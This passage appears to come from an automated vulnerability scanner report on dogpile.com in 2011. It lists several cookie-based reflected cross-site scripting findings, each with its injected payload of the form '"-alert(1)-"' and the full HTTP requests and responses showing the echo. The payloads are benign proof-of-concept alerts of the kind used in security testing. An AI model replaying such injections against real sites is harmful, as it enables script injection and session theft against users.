Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com93152"-alert(1)-"816df919a4f; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:18 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=f99d27d203c74389a638c16a3af0cb01&ActionId=6c2d543d2bdb42469455c16a3af0cb01&CookieDomain=.dogpile.com93152"-alert(1)-"816df919a4f; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:54 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:54 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:15:54 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=f99d27d203c74389a638c16a3af0cb01&ActionId=6c2d543d2bdb42469455c16a3af0cb01&CookieDomain=.dogpile.com93152"-alert(1)-"816df919a4f; expires=Fri, 01 Apr 2011 17:35:54 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.143. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_rss/web/GE+Zero+Taxes

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7886"-alert(1)-"78b4217b136 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_rss/web/GE+Zero+Taxes HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; wsRecent=MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.comc7886"-alert(1)-"78b4217b136

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=b537cbedf58a457f8f53c16a3af0cb01&CookieDomain=.dogpile.comc7886"-alert(1)-"78b4217b136; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:22 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:22 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:22 GMT; path=/
Set-Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677176027; path=/
Set-Cookie: wsRecent=GE+Zero+Taxes,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:23 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 160992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=b537cbedf58a457f8f53c16a3af0cb01&CookieDomain=.dogpile.comc7886"-alert(1)-"78b4217b136; expires=Fri, 01 Apr 2011 17:19:22 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.144. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_rss/web/Go+Daddy+CEO+Elephant

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66b73"-alert(1)-"6a66de51dba was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_rss/web/Go+Daddy+CEO+Elephant HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.com66b73"-alert(1)-"6a66de51dba; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; wsRecent=MLB+Schedule,Web,Relevance,

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=3d0f54f01437428e97eec16a3af0cb01&CookieDomain=.dogpile.com66b73"-alert(1)-"6a66de51dba; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:33 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:33 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:33 GMT; path=/
Set-Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676993418; path=/
Set-Cookie: wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:33 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 162009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=3d0f54f01437428e97eec16a3af0cb01&CookieDomain=.dogpile.com66b73"-alert(1)-"6a66de51dba; expires=Fri, 01 Apr 2011 17:16:33 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.145. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11 [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/about/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b56e7"-alert(1)-"2b8c3a90ea was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_rss/ws/about/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11?rfcp=TopNavigation&rfcid=407&qcat=Web6c5ea\'%3balert(1)//e445c104ee1&qkw=MLB%20Schedule&newtxn=false&qcoll=Relevance&_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 5:01:42 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fe86ba7b839e447e97c1c16a3af0cb01&ActionId=5b843be01d96476c9873c16a3af0cb01&CookieDomain=.dogpile.comb56e7"-alert(1)-"2b8c3a90ea

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=5b843be01d96476c9873c16a3af0cb01&ActionId=6d731ec229be41909e32c16a3af0cb01&CookieDomain=.dogpile.comb56e7"-alert(1)-"2b8c3a90ea; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:21:52 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 5:01:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:01:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:01:51 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=5b843be01d96476c9873c16a3af0cb01&ActionId=6d731ec229be41909e32c16a3af0cb01&CookieDomain=.dogpile.comb56e7"-alert(1)-"2b8c3a90ea; expires=Fri, 01 Apr 2011 17:21:52 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.146. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11 [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/faq/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a4fb"-alert(1)-"9c0762a1d15 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_rss/ws/faq/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:34 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=fe86ba7b839e447e97c1c16a3af0cb01&CookieDomain=.dogpile.com6a4fb"-alert(1)-"9c0762a1d15

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fe86ba7b839e447e97c1c16a3af0cb01&ActionId=c871e3a9db9b43a0819cc16a3af0cb01&CookieDomain=.dogpile.com6a4fb"-alert(1)-"9c0762a1d15; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:21:52 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 5:01:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:01:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:01:52 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 64503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fe86ba7b839e447e97c1c16a3af0cb01&ActionId=c871e3a9db9b43a0819cc16a3af0cb01&CookieDomain=.dogpile.com6a4fb"-alert(1)-"9c0762a1d15; expires=Fri, 01 Apr 2011 17:21:52 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.147. http://www.dogpile.com/dogpile_rss/ws/index/ [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/index/

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 193eb"-alert(1)-"b095a032310 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_rss/ws/index/?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:08:30 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=efab2d4d5b684fe9b96cc16a3af0cb01&ActionId=fc23be7bf89f4d2eac78c16a3af0cb01&CookieDomain=.dogpile.com193eb"-alert(1)-"b095a032310

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=fc23be7bf89f4d2eac78c16a3af0cb01&ActionId=28f8ba9483394dd6935dc16a3af0cb01&CookieDomain=.dogpile.com193eb"-alert(1)-"b095a032310; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:29:21 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:09:21 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:09:21 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:09:21 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=fc23be7bf89f4d2eac78c16a3af0cb01&ActionId=28f8ba9483394dd6935dc16a3af0cb01&CookieDomain=.dogpile.com193eb"-alert(1)-"b095a032310; expires=Fri, 01 Apr 2011 17:29:21 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.148. http://www.dogpile.com/favicon.ico [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /favicon.ico

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55c43"-alert(1)-"46f043feb84 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=5b843be01d96476c9873c16a3af0cb01&ActionId=d139d0f78e1a40d2844cc16a3af0cb01&CookieDomain=.dogpile.com55c43"-alert(1)-"46f043feb84; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 5:07:45 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=d139d0f78e1a40d2844cc16a3af0cb01&ActionId=731818522a4c460a8c29c16a3af0cb01&CookieDomain=.dogpile.com55c43"-alert(1)-"46f043feb84; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:27:57 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 5:07:57 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:07:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:07:56 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=d139d0f78e1a40d2844cc16a3af0cb01&ActionId=731818522a4c460a8c29c16a3af0cb01&CookieDomain=.dogpile.com55c43"-alert(1)-"46f043feb84; expires=Fri, 01 Apr 2011 17:27:57 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.149. http://www.dogpile.com/info.dogpl.rss/Web6c5ea//' [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /info.dogpl.rss/Web6c5ea//'

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1df86"-alert(1)-"c22c881b4b3 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /info.dogpl.rss/Web6c5ea//';Alert(%22Xss%22)//E445c104ee1/MLB+Schedule HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:08:30 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=efab2d4d5b684fe9b96cc16a3af0cb01&ActionId=fc23be7bf89f4d2eac78c16a3af0cb01&CookieDomain=.dogpile.com1df86"-alert(1)-"c22c881b4b3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=fc23be7bf89f4d2eac78c16a3af0cb01&ActionId=9aee2d8f1e244aa784bbc16a3af0cb01&CookieDomain=.dogpile.com1df86"-alert(1)-"c22c881b4b3; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:29:25 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:09:25 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:09:25 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:09:24 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
